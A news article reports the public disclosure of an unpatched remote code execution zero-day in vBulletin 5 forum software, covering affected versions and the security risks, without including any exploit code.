AN ANONYMOUS RESEARCHER has published details about an unpatched, zero-day vulnerability affecting web forum application vBulletin.
The flaw affects version 5 of the vBulletin forum software and could be exploited by hackers to take over vulnerable web forums.
The hacker revealed details about this "pre-authentication remote code execution" weakness in a post to the Full Disclosure mailing list, without disclosing their actual email address. Proof-of-concept code that could be used to exploit the zero-day flaw in the wild was also published.
The post explained how attackers could use a simple HTTP POST request to remotely execute a shell command, without authentication, on targeted vBulletin server. That would enable an attacker to hijack the webserver running the forum software, to launch attacks on other machines and to modify and steal sensitive information.
[email protected] ? (@notdan) September 24, 2019
The vulnerability appears to affect vBulletin versions 5.0.0 up to the latest 5.5.4 and no patch is currently available.
vBulletin is one of the most popular web forum software package powering over 100,000 websites. It was launched in 2012 and, despite being a commercial product, it has a larger user base than open-source products, such as XenForo, phpBB, MyBB, Simple Machines Forum, and others.
It is not known whether the anonymous researcher had notified the vBulletin team about the vulnerability nor whether its failure to address the issue prompted the researcher to disclose the flaw publicly.
Because details of the unpatched vulnerability are now in public domain, security experts are concerned that hackers could soon start attacking web forums across the internet in an effort to steal sensitive user information in bulk.
They have also advised websites running vBulletin version 5 to closely watch their servers to ensure that nobody exploits the vBulletin vulnerability to carry out attacks on their websites. µ
You could soon buy that ivory backscratcher on Marketplace in a few taps
Just in case you're too posh for Whole Foods
Borked butterfly mechanism is dead
AI nirvana in the cloud